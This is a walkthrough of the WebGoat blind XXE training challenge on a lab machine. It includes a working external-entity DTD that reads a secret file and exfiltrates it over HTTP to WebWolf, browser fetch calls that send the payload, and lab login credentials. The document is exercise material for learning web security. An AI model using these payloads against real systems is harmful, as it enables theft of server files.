====================================================================
XXE BLIND - COMPLETE SOLUTION (FIXED FOR REMOTE WEBGOAT)
====================================================================

ISSUE: WebGoat is on a remote machine (192.168.254.112)
Your local Python server (127.0.0.1:8003) is NOT accessible to it!

SOLUTION: Upload DTD to WebWolf on the remote machine

====================================================================
STEP-BY-STEP SOLUTION:
====================================================================

STEP 1: Access Remote WebWolf
------------------------------
1. Open browser and go to: http://192.168.254.112:8002/WebWolf
2. Login with:
   Username: nooniman
   Password: nooniman

STEP 2: Upload DTD File Manually
---------------------------------
1. In WebWolf, look for one of these menu items:
   - "File server"
   - "Files"
   - "File upload"
   - "Upload"

2. Click on it and you should see a file upload interface

3. Upload the file: c:\webgoat-scripts-1\attack_remote.dtd
   
   OR create a new file with this content:
   --------------------------------------------------------
   <!ENTITY % file SYSTEM "file:///C:/Users/mahad/.webgoat-2025.3/XXE/nooniman/secret.txt">
   <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://localhost:8002/WebWolf/landing?secret=%file;'>">
   %eval;
   %exfil;
   --------------------------------------------------------
   Save it as: attack.dtd
   Then upload it.

4. After upload, the file should be available at:
   http://192.168.254.112:8002/files/nooniman/attack.dtd

STEP 3: Verify DTD is Accessible
---------------------------------
Run this in browser console or new tab:

fetch('http://192.168.254.112:8002/files/nooniman/attack.dtd')
  .then(r => r.text())
  .then(console.log);

You should see your DTD content!

STEP 4: Send Blind XXE Attack
------------------------------
In browser console (while on WebGoat page), run:

fetch('http://192.168.254.112:8001/WebGoat/xxe/blind', {
  method: 'POST',
  credentials: 'include',
  headers: {'Content-Type': 'application/xml'},
  body: `<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://192.168.254.112:8002/files/nooniman/attack.dtd">
  %remote;
]>
<comment><text>Blind XXE Attack</text></comment>`
}).then(r => r.text()).then(console.log);

STEP 5: Check WebWolf for Exfiltrated Secret
---------------------------------------------
1. Go back to WebWolf: http://192.168.254.112:8002/WebWolf
2. Click on "Incoming requests" in the left menu
3. Look for a recent request to /WebWolf/landing
4. The URL will contain: ?secret=<THE_SECRET_VALUE>
5. Copy the secret value

STEP 6: Submit Secret to WebGoat
---------------------------------
Replace YOUR_SECRET_HERE with the actual secret:

fetch('http://192.168.254.112:8001/WebGoat/xxe/blind', {
  method: 'POST',
  credentials: 'include',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    comment: "YOUR_SECRET_HERE"
  })
}).then(r => r.text()).then(console.log);

====================================================================
WHY THIS WORKS:
====================================================================

1. WebGoat (192.168.254.112:8001) receives your XXE payload
2. WebGoat fetches DTD from WebWolf (192.168.254.112:8002)
   - Both are on the SAME remote machine, so localhost:8002 works!
3. DTD tells WebGoat to:
   a) Read the secret file on its filesystem
   b) Send the secret to WebWolf via HTTP request
4. You check WebWolf's incoming requests to see the secret
5. You submit the secret back to WebGoat to complete the challenge

====================================================================
KEY DIFFERENCES FROM LOCAL SETUP:
====================================================================

❌ WRONG (doesn't work):
- DTD hosted on 127.0.0.1:8003 (your local machine)
- WebGoat can't access your local machine!

✅ CORRECT (works):
- DTD hosted on 192.168.254.112:8002/files/nooniman/attack.dtd
- WebGoat CAN access WebWolf (same network/machine)
- DTD uses localhost:8002 for exfiltration (from WebGoat's perspective)

====================================================================
TROUBLESHOOTING:
====================================================================

Q: Can't upload to WebWolf?
A: Try these endpoints:
   - WebWolf web interface (recommended)
   - Different browser if CORS issues
   - Contact your instructor if WebWolf isn't accessible

Q: DTD returns 404?
A: Make sure you're checking the right path:
   http://192.168.254.112:8002/files/nooniman/attack.dtd
   NOT attack_remote.dtd (unless you named it that)

Q: No incoming request in WebWolf?
A: Check:
   - DTD file path is correct
   - XML payload syntax is correct
   - WebGoat can access the DTD URL
   - File path in DTD matches your secret location

Q: Wrong secret?
A: Double-check you copied the complete value from the WebWolf URL

====================================================================
ALTERNATIVE: If WebWolf Upload Still Fails
====================================================================

If you absolutely cannot upload to WebWolf, you could try:

1. Using ngrok or similar tunnel to expose your local server
2. Asking instructor to host the DTD
3. Using a public hosting service (pastebin, gist, etc.)
   But change the exfiltration URL accordingly

====================================================================
